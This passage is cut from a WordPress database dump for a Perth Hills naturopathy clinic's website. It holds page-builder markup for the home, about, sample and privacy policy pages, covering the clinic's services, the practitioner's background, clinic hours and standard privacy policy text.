column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<span style=\"font-family: Montserrat; font-weight: normal;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<h3><span style=\"font-family: \'Playfair Display\'; \">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat; \">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat; \">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-25 21:07:08','2021-05-25 13:07:08','',28,'https://verde.desidrivers.com.au/?p=146',0,'revision','',0),(156,1,'2021-05-25 21:39:28','2021-05-25 13:39:28','<!-- wp:divi/placeholder -->\n[et_pb_section][et_pb_row][et_pb_column type=\"4_4\"][et_pb_text]<!-- divi:heading -->\n<h2>Who we are</h2>\n<!-- /divi:heading -->\n\n<!-- divi:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>Our website address is: https://verde.desidrivers.com.au.</p>\n<!-- /divi:paragraph -->\n\n<!-- divi:heading -->\n<h2>Comments</h2>\n<!-- /divi:heading -->\n\n<!-- divi:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>When visitors leave comments on the site we collect the data shown in the comments form, and also the visitor’s IP address and browser user agent string to help spam detection.</p>\n<!-- /divi:paragraph -->\n\n<!-- divi:paragraph -->\n<p>An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https://automattic.com/privacy/. After approval of your comment, your profile picture is visible to the public in the context of your comment.</p>\n<!-- /divi:paragraph -->\n\n<!-- divi:heading -->\n<h2>Media</h2>\n<!-- /divi:heading -->\n\n<!-- divi:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you upload images to the website, you should avoid uploading images with embedded location data (EXIF GPS) included. Visitors to the website can download and extract any location data from images on the website.</p>\n<!-- /divi:paragraph -->\n\n<!-- divi:heading -->\n<h2>Cookies</h2>\n<!-- /divi:heading -->\n\n<!-- divi:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you leave a comment on our site you may opt-in to saving your name, email address and website in cookies. These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.</p>\n<!-- /divi:paragraph -->\n\n<!-- divi:paragraph -->\n<p>If you visit our login page, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.</p>\n<!-- /divi:paragraph -->\n\n<!-- divi:paragraph -->\n<p>When you log in, we will also set up several cookies to save your login information and your screen display choices. Login cookies last for two days, and screen options cookies last for a year. If you select \"Remember Me\", your login will persist for two weeks. If you log out of your account, the login cookies will be removed.</p>\n<!-- /divi:paragraph -->\n\n<!-- divi:paragraph -->\n<p>If you edit or publish an article, an additional cookie will be saved in your browser. This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.</p>\n<!-- /divi:paragraph -->\n\n<!-- divi:heading -->\n<h2>Embedded content from other websites</h2>\n<!-- /divi:heading -->\n\n<!-- divi:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>Articles on this site may include embedded content (e.g. videos, images, articles, etc.). Embedded content from other websites behaves in the exact same way as if the visitor has visited the other website.</p>\n<!-- /divi:paragraph -->\n\n<!-- divi:paragraph -->\n<p>These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracking your interaction with the embedded content if you have an account and are logged in to that website.</p>\n<!-- /divi:paragraph -->\n\n<!-- divi:heading -->\n<h2>Who we share your data with</h2>\n<!-- /divi:heading -->\n\n<!-- divi:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you request a password reset, your IP address will be included in the reset email.</p>\n<!-- /divi:paragraph -->\n\n<!-- divi:heading -->\n<h2>How long we retain your data</h2>\n<!-- /divi:heading -->\n\n<!-- divi:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.</p>\n<!-- /divi:paragraph -->\n\n<!-- divi:paragraph -->\n<p>For users that register on our website (if any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username). Website administrators can also see and edit that information.</p>\n<!-- /divi:paragraph -->\n\n<!-- divi:heading -->\n<h2>What rights you have over your data</h2>\n<!-- /divi:heading -->\n\n<!-- divi:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you have an account on this site, or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you. This does not include any data we are obliged to keep for administrative, legal, or security purposes.</p>\n<!-- /divi:paragraph -->\n\n<!-- divi:heading -->\n<h2>Where we send your data</h2>\n<!-- /divi:heading -->\n\n<!-- divi:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>Visitor comments may be checked through an automated spam detection service.</p>\n<!-- /divi:paragraph -->[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]\n<!-- /wp:divi/placeholder -->','Privacy Policy','','inherit','closed','closed','','3-revision-v1','','','2021-05-25 21:39:28','2021-05-25 13:39:28','',3,'https://verde.desidrivers.com.au/?p=156',0,'revision','',0),(155,1,'2021-05-25 21:37:40','2021-05-25 13:37:40','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p>Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </p>\n<p>She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </p>\n<p>Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. Mel also runs Verde Botanicals, offering small-batch, handmade herbal remedies to keep her creative juices flowing. </p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/IMG_3973-scaled.jpg\" title_text=\"IMG_3973\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" hover_enabled=\"0\" background_color=\"#CCD4C8\" sticky_enabled=\"0\" custom_padding=\"|20px||20px|false|false\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/IMG_3912-scaled.jpg\" title_text=\"IMG_3912\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" hover_enabled=\"0\" custom_css_main_element=\"||||\" sticky_enabled=\"0\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p>Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting or creating, you’ll most likely find her brewing a cuppa, chasing after her three children or wandering through the forest. </p>\n<p> </p>\n<p><strong>Qualifications</strong>: </p>\n<p>Bachelor of Health Science (Naturopathy) </p>\n<p>Bachelor of Science (Biological Science) </p>\n<p> </p>\n<p><strong>Professional memberships</strong>: </p>\n<p>Australian Natural Therapist’s Association (ANTA) - Full member</p>\n<ul></ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; \">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat; \">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat; \">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About Us','','inherit','closed','closed','','27-revision-v1','','','2021-05-25 21:37:40','2021-05-25 13:37:40','',27,'https://verde.desidrivers.com.au/?p=155',0,'revision','',0),(150,1,'2021-05-25 21:19:25','2021-05-25 13:19:25','','IMG_3908','','inherit','open','closed','','img_3908-2','','','2021-05-25 21:19:25','2021-05-25 13:19:25','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/IMG_3908-1.jpg',0,'attachment','image/jpeg',0),(149,1,'2021-05-25 21:16:01','2021-05-25 13:16:01','','IMG_3908','','inherit','open','closed','','img_3908','','','2021-05-25 21:16:01','2021-05-25 13:16:01','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/IMG_3908.jpg',0,'attachment','image/jpeg',0),(151,1,'2021-05-25 21:22:46','2021-05-25 13:22:46','','IMG_3973','','inherit','open','closed','','img_3973','','','2021-05-25 21:22:46','2021-05-25 13:22:46','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/IMG_3973.jpg',0,'attachment','image/jpeg',0),(160,1,'2021-05-25 21:45:53','2021-05-25 13:45:53','<!-- wp:divi/placeholder -->\n[et_pb_section][et_pb_row][et_pb_column type=\"4_4\"][et_pb_text]<!-- divi:paragraph -->\n<p>This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:</p>\n<!-- /divi:paragraph -->\n\n<!-- divi:quote -->\n<blockquote class=\"wp-block-quote\"><p>Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my website. I live in Los Angeles, have a great dog named Jack, and I like piña coladas. (And gettin\' caught in the rain.)</p></blockquote>\n<!-- /divi:quote -->\n\n<!-- divi:paragraph -->\n<p>...or something like this:</p>\n<!-- /divi:paragraph -->\n\n<!-- divi:quote -->\n<blockquote class=\"wp-block-quote\"><p>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</p></blockquote>\n<!-- /divi:quote -->\n\n<!-- divi:paragraph -->\n<p>As a new WordPress user, you should go to <a href=\"https://verde.desidrivers.com.au/wp-admin/\">your dashboard</a> to delete this page and create new pages for your content. Have fun!</p>\n<!-- /divi:paragraph -->[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]\n<!-- /wp:divi/placeholder -->','Sample Page','','inherit','closed','closed','','2-revision-v1','','','2021-05-25 21:45:53','2021-05-25 13:45:53','',2,'https://verde.desidrivers.com.au/?p=160',0,'revision','',0),(152,1,'2021-05-25 21:33:25','2021-05-25 13:33:25','','IMG_3912','','inherit','open','closed','','img_3912','','','2021-05-25 21:33:25','2021-05-25 13:33:25','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/IMG_3912.jpg',0,'attachment','image/jpeg',0),(158,1,'2021-05-25 21:44:13','2021-05-25 13:44:13','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\"][et_pb_row _builder_version=\"4.9.4\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" custom_padding=\"|||\" hover_enabled=\"0\" custom_padding__hover=\"|||\" sticky_enabled=\"0\"][et_pb_text _builder_version=\"4.9.4\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" hover_enabled=\"0\" inline_fonts=\"Playfair Display\" sticky_enabled=\"0\"]<!-- divi:heading -->\n<h1><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>PRIVACY POLICY</strong></span></h1>\n<p>At Verde Naturopathy, we are committed to protecting your privacy as a client and an online visitor to our website. We use the information we collect about you to maximize the services that we provide to you. We respect the privacy and confidentiality of the information provided by you and are bound by and adhere to the <em>Privacy Act (1988)</em> and Australian Privacy Principles.</p>\n<h1><strong>INFORMATION WE COLLECT FROM YOU</strong></h1>\n<p>In the course of your visits to our website or use of our Naturopathic services, we may obtain the following information about you: name, company name, email address, telephone number, credit card details, billing address, geographic location, IP address, survey responses, support queries, social media comments and handles (together ‘Personal Data’). Our services are not directed to persons under 18 and we do not 